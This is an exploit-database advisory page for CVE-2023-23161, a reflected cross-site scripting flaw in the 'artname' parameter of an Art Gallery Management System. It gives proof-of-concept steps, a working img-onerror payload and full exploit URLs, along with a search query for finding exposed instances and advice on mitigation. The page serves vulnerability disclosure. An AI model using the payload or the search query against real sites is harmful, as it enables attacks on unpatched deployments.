header-logo
Suggest Exploit
vendor:
Art Gallery Management System Project
by:
Rahul Patwari
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: Art Gallery Management System Project
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-23161
CPE: a:phpgurukul:art_gallery_management_system_project:1.0
Metasploit:
Other Scripts:
Tags: cve,cve2023,art,gallery,xss
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'verified': True, 'fofa-query': 'title="Art Gallery Management System"', 'vendor': 'art_gallery_management_system_project', 'product': 'art_gallery_management_system'}
Platforms Tested: XAMPP / Windows 10
2023

Art Gallery Management System Project v1.0 – Reflected Cross-Site Scripting (XSS)

This exploit allows an attacker to inject malicious code into a web application, which is then executed by the victim's browser. In this specific case, the vulnerability exists in the 'artname' parameter of the 'product.php' page. By inserting a crafted XSS payload, an attacker can trigger the execution of arbitrary JavaScript code on the victim's browser.

Mitigation:

To mitigate this vulnerability, the application should implement proper input validation and output encoding to prevent the execution of malicious code. Specifically, the 'artname' parameter should be properly validated and sanitized before being displayed to the user.
Source

Exploit-DB raw data:

# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23161

# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0

# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints

# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 5- XSS has been triggered.

# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
"
XSS will trigger.